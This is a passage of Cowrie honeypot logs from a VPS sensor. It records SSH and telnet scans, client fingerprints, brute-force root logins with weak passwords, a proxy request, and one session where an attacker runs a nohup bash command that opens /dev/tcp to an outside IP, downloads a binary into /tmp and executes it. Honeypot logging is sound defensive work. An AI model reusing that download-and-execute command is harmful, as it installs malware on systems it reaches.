bc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:17:11.369321Z","src_ip":"212.227.235.229","session":"bf55eede94ad"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:17:11.866219Z","src_ip":"212.227.235.229","session":"bf55eede94ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":64001,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df874df0bd8","protocol":"ssh","message":"New connection: 212.227.125.160:64001 (1.2.3.4:22) [session: 0df874df0bd8]","sensor":"my-vps","timestamp":"2025-09-08T16:17:27.590232Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:17:27.641127Z","src_ip":"212.227.125.160","session":"0df874df0bd8"}
{"eventid":"cowrie.session.connect","src_ip":"91.224.92.32","src_port":24756,"dst_ip":"1.2.3.4","dst_port":22,"session":"16946afc0758","protocol":"ssh","message":"New connection: 91.224.92.32:24756 (1.2.3.4:22) [session: 16946afc0758]","sensor":"my-vps","timestamp":"2025-09-08T16:17:50.980618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:17:50.981624Z","src_ip":"91.224.92.32","session":"16946afc0758"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:17:50.997517Z","src_ip":"91.224.92.32","session":"16946afc0758"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:17:51.140020Z","src_ip":"91.224.92.32","session":"16946afc0758"}
{"eventid":"cowrie.session.connect","src_ip":"193.46.255.244","src_port":32534,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d18d12f41a7","protocol":"ssh","message":"New connection: 193.46.255.244:32534 (1.2.3.4:22) [session: 8d18d12f41a7]","sensor":"my-vps","timestamp":"2025-09-08T16:20:24.091127Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:20:24.091886Z","src_ip":"193.46.255.244","session":"8d18d12f41a7"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:20:24.121394Z","src_ip":"193.46.255.244","session":"8d18d12f41a7"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:20:24.321401Z","src_ip":"193.46.255.244","session":"8d18d12f41a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55530,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3b5631b1b6a","protocol":"ssh","message":"New connection: 212.227.235.229:55530 (1.2.3.4:22) [session: b3b5631b1b6a]","sensor":"my-vps","timestamp":"2025-09-08T16:20:28.623234Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PUTTY","message":"Remote SSH version: SSH-2.0-PUTTY","sensor":"my-vps","timestamp":"2025-09-08T16:20:28.624029Z","src_ip":"212.227.235.229","session":"b3b5631b1b6a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-09-08T16:20:28.728669Z","src_ip":"212.227.235.229","session":"b3b5631b1b6a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:20:29.225873Z","src_ip":"212.227.235.229","session":"b3b5631b1b6a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11289,"dst_ip":"1.2.3.4","dst_port":22,"session":"73193bb8d8ac","protocol":"ssh","message":"New connection: 212.227.235.229:11289 (1.2.3.4:22) [session: 73193bb8d8ac]","sensor":"my-vps","timestamp":"2025-09-08T16:21:26.572920Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:21:26.573972Z","src_ip":"212.227.235.229","session":"73193bb8d8ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11676,"dst_ip":"1.2.3.4","dst_port":22,"session":"57f485d781fe","protocol":"ssh","message":"New connection: 212.227.235.229:11676 (1.2.3.4:22) [session: 57f485d781fe]","sensor":"my-vps","timestamp":"2025-09-08T16:21:26.692203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T16:21:26.693272Z","src_ip":"212.227.235.229","session":"57f485d781fe"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T16:21:26.832750Z","src_ip":"212.227.235.229","session":"57f485d781fe"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:21:27.253020Z","src_ip":"212.227.235.229","session":"57f485d781fe"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T16:21:27.394028Z","session":"57f485d781fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59941,"dst_ip":"1.2.3.4","dst_port":23,"session":"db9256a88860","protocol":"telnet","message":"New connection: 212.227.125.160:59941 (1.2.3.4:23) [session: db9256a88860]","sensor":"my-vps","timestamp":"2025-09-08T16:21:34.678753Z"}
{"eventid":"cowrie.session.closed","duration":31.972582817077637,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:22:06.651243Z","src_ip":"212.227.125.160","session":"db9256a88860"}
{"eventid":"cowrie.session.connect","src_ip":"8.138.136.155","src_port":44774,"dst_ip":"1.2.3.4","dst_port":22,"session":"622467985e48","protocol":"ssh","message":"New connection: 8.138.136.155:44774 (1.2.3.4:22) [session: 622467985e48]","sensor":"my-vps","timestamp":"2025-09-08T16:22:09.089857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-makiko","message":"Remote SSH version: SSH-2.0-makiko","sensor":"my-vps","timestamp":"2025-09-08T16:22:09.091103Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.client.kex","hassh":"2f5ebb184f5d02324eed9a822f5259dc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1-etm@openssh.com,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","rsa-sha2-256","rsa-sha2-512","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ssh-rsa"],"encCS":["chacha20-poly1305@openssh.com","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1-etm@openssh.com","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2f5ebb184f5d02324eed9a822f5259dc","sensor":"my-vps","timestamp":"2025-09-08T16:22:09.091810Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-09-08T16:22:09.785141Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-08T16:22:11.010475Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T16:22:11.503471Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.command.input","input":"cat /bin/echo","message":"CMD: cat /bin/echo","sensor":"my-vps","timestamp":"2025-09-08T16:22:11.505838Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.command.input","input":"nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/GDlSokdJ8L && chmod +x /tmp/GDlSokdJ8L && /tmp/GDlSokdJ8L UpwXJTjkaulYxyttvC6+YyDfXOxr/SEvCI4iJJIUIjHkY+9W3ypkuDisZCzRQuxq8y8mEY89J4QcITH7b+9M0TRkvziiZCnfQuxu/zshFo0iIldM/CJre3Qxsj4K6m1R4b8Q197sL7FqNdrwRPvg\" &","message":"CMD: nohup bash -c \"exec 6<>/dev/tcp/168.119.173.48/60142 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/GDlSokdJ8L && chmod +x /tmp/GDlSokdJ8L && /tmp/GDlSokdJ8L UpwXJTjkaulYxyttvC6+YyDfXOxr/SEvCI4iJJIUIjHkY+9W3ypkuDisZCzRQuxq8y8mEY89J4QcITH7b+9M0TRkvziiZCnfQuxu/zshFo0iIldM/CJre3Qxsj4K6m1R4b8Q197sL7FqNdrwRPvg\" &","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.740099Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.command.input","input":"head -c 1458464 > /tmp/oca2n9fx2V","message":"CMD: head -c 1458464 > /tmp/oca2n9fx2V","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.743764Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.command.input","input":"cat /bin/echoQtd#UPX!","message":"CMD: cat /bin/echoQtd#UPX!","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.974923Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.command.input","input":">yoA@/;'8ELFP;i2","message":"CMD: >yoA@/;'8ELFP;i2","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.980392Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.984292Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ed10d36d922d16a68f19203e067942fc4243a9494b775b46b416fa072257a72b","size":1980,"shasum":"ed10d36d922d16a68f19203e067942fc4243a9494b775b46b416fa072257a72b","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/ed10d36d922d16a68f19203e067942fc4243a9494b775b46b416fa072257a72b after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.985981Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:22:17.987475Z","src_ip":"8.138.136.155","session":"622467985e48"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60534,"dst_ip":"1.2.3.4","dst_port":22,"session":"43e6edbaf2a3","protocol":"ssh","message":"New connection: 217.72.205.35:60534 (1.2.3.4:22) [session: 43e6edbaf2a3]","sensor":"my-vps","timestamp":"2025-09-08T16:22:22.909685Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:22:22.910931Z","src_ip":"217.72.205.35","session":"43e6edbaf2a3"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:22:36.695669Z","src_ip":"212.227.235.229","session":"57f485d781fe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":65105,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c05651b6347","protocol":"ssh","message":"New connection: 212.227.125.160:65105 (1.2.3.4:22) [session: 4c05651b6347]","sensor":"my-vps","timestamp":"2025-09-08T16:24:40.249911Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:24:40.306911Z","src_ip":"212.227.125.160","session":"4c05651b6347"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56735,"dst_ip":"1.2.3.4","dst_port":23,"session":"93026ff09cdb","protocol":"telnet","message":"New connection: 212.227.125.160:56735 (1.2.3.4:23) [session: 93026ff09cdb]","sensor":"my-vps","timestamp":"2025-09-08T16:24:53.871483Z"}
{"eventid":"cowrie.session.closed","duration":12.606781244277954,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:25:06.478198Z","src_ip":"212.227.125.160","session":"93026ff09cdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57037,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5220099a338","protocol":"telnet","message":"New connection: 212.227.125.160:57037 (1.2.3.4:23) [session: a5220099a338]","sensor":"my-vps","timestamp":"2025-09-08T16:25:06.698244Z"}
{"eventid":"cowrie.session.closed","duration":12.777591228485107,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:25:19.475769Z","src_ip":"212.227.125.160","session":"a5220099a338"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57349,"dst_ip":"1.2.3.4","dst_port":23,"session":"6286110075ea","protocol":"telnet","message":"New connection: 212.227.125.160:57349 (1.2.3.4:23) [session: 6286110075ea]","sensor":"my-vps","timestamp":"2025-09-08T16:25:19.682451Z"}
{"eventid":"cowrie.session.closed","duration":12.812986135482788,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:25:32.495341Z","src_ip":"212.227.125.160","session":"6286110075ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57657,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d6b459e7dc5","protocol":"telnet","message":"New connection: 212.227.125.160:57657 (1.2.3.4:23) [session: 0d6b459e7dc5]","sensor":"my-vps","timestamp":"2025-09-08T16:25:32.739073Z"}
{"eventid":"cowrie.session.closed","duration":12.790725946426392,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:25:45.528457Z","src_ip":"212.227.125.160","session":"0d6b459e7dc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57972,"dst_ip":"1.2.3.4","dst_port":23,"session":"20095f5241da","protocol":"telnet","message":"New connection: 212.227.125.160:57972 (1.2.3.4:23) [session: 20095f5241da]","sensor":"my-vps","timestamp":"2025-09-08T16:25:45.751041Z"}
{"eventid":"cowrie.session.closed","duration":12.756710767745972,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:25:58.507668Z","src_ip":"212.227.125.160","session":"20095f5241da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58297,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe0c5d2afb4c","protocol":"telnet","message":"New connection: 212.227.125.160:58297 (1.2.3.4:23) [session: fe0c5d2afb4c]","sensor":"my-vps","timestamp":"2025-09-08T16:25:58.681279Z"}
{"eventid":"cowrie.session.closed","duration":12.863059282302856,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:26:11.544234Z","src_ip":"212.227.125.160","session":"fe0c5d2afb4c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58630,"dst_ip":"1.2.3.4","dst_port":23,"session":"b30fac51eb23","protocol":"telnet","message":"New connection: 212.227.125.160:58630 (1.2.3.4:23) [session: b30fac51eb23]","sensor":"my-vps","timestamp":"2025-09-08T16:26:11.736771Z"}
{"eventid":"cowrie.session.closed","duration":12.771870374679565,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:26:24.508579Z","src_ip":"212.227.125.160","session":"b30fac51eb23"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58950,"dst_ip":"1.2.3.4","dst_port":23,"session":"ad9df7877b06","protocol":"telnet","message":"New connection: 212.227.125.160:58950 (1.2.3.4:23) [session: ad9df7877b06]","sensor":"my-vps","timestamp":"2025-09-08T16:26:24.692022Z"}
{"eventid":"cowrie.session.closed","duration":12.855381488800049,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:26:37.547333Z","src_ip":"212.227.125.160","session":"ad9df7877b06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59280,"dst_ip":"1.2.3.4","dst_port":23,"session":"c78dfd8ea175","protocol":"telnet","message":"New connection: 212.227.125.160:59280 (1.2.3.4:23) [session: c78dfd8ea175]","sensor":"my-vps","timestamp":"2025-09-08T16:26:37.781184Z"}
{"eventid":"cowrie.session.closed","duration":12.798816680908203,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:26:50.579939Z","src_ip":"212.227.125.160","session":"c78dfd8ea175"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59609,"dst_ip":"1.2.3.4","dst_port":23,"session":"b560f1a3e1d6","protocol":"telnet","message":"New connection: 212.227.125.160:59609 (1.2.3.4:23) [session: b560f1a3e1d6]","sensor":"my-vps","timestamp":"2025-09-08T16:26:50.904375Z"}
{"eventid":"cowrie.session.closed","duration":12.727437734603882,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:27:03.631737Z","src_ip":"212.227.125.160","session":"b560f1a3e1d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59932,"dst_ip":"1.2.3.4","dst_port":23,"session":"8459c174342c","protocol":"telnet","message":"New connection: 212.227.125.160:59932 (1.2.3.4:23) [session: 8459c174342c]","sensor":"my-vps","timestamp":"2025-09-08T16:27:03.851831Z"}
{"eventid":"cowrie.session.closed","duration":12.697604656219482,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:27:16.549341Z","src_ip":"212.227.125.160","session":"8459c174342c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60246,"dst_ip":"1.2.3.4","dst_port":23,"session":"f80af76ac9a8","protocol":"telnet","message":"New connection: 212.227.125.160:60246 (1.2.3.4:23) [session: f80af76ac9a8]","sensor":"my-vps","timestamp":"2025-09-08T16:27:16.820323Z"}
{"eventid":"cowrie.session.closed","duration":12.73005986213684,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:27:29.550306Z","src_ip":"212.227.125.160","session":"f80af76ac9a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60589,"dst_ip":"1.2.3.4","dst_port":23,"session":"144b66e85828","protocol":"telnet","message":"New connection: 212.227.125.160:60589 (1.2.3.4:23) [session: 144b66e85828]","sensor":"my-vps","timestamp":"2025-09-08T16:27:29.690023Z"}
{"eventid":"cowrie.session.closed","duration":12.844590425491333,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:27:42.534528Z","src_ip":"212.227.125.160","session":"144b66e85828"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60902,"dst_ip":"1.2.3.4","dst_port":23,"session":"68e36c6509a5","protocol":"telnet","message":"New connection: 212.227.125.160:60902 (1.2.3.4:23) [session: 68e36c6509a5]","sensor":"my-vps","timestamp":"2025-09-08T16:27:42.706745Z"}
{"eventid":"cowrie.session.closed","duration":12.762312650680542,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:27:55.468966Z","src_ip":"212.227.125.160","session":"68e36c6509a5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32980,"dst_ip":"1.2.3.4","dst_port":23,"session":"0d6bc422d39f","protocol":"telnet","message":"New connection: 212.227.125.160:32980 (1.2.3.4:23) [session: 0d6bc422d39f]","sensor":"my-vps","timestamp":"2025-09-08T16:27:55.686889Z"}
{"eventid":"cowrie.session.closed","duration":12.711434841156006,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:28:08.398254Z","src_ip":"212.227.125.160","session":"0d6bc422d39f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49978,"dst_ip":"1.2.3.4","dst_port":22,"session":"28cf641a5b8a","protocol":"ssh","message":"New connection: 217.72.205.35:49978 (1.2.3.4:22) [session: 28cf641a5b8a]","sensor":"my-vps","timestamp":"2025-09-08T16:29:14.778418Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T16:29:14.779651Z","src_ip":"217.72.205.35","session":"28cf641a5b8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40084,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3a19cf604c4","protocol":"ssh","message":"New connection: 212.227.125.160:40084 (1.2.3.4:22) [session: c3a19cf604c4]","sensor":"my-vps","timestamp":"2025-09-08T16:30:14.302856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T16:30:15.218730Z","src_ip":"212.227.125.160","session":"c3a19cf604c4"}
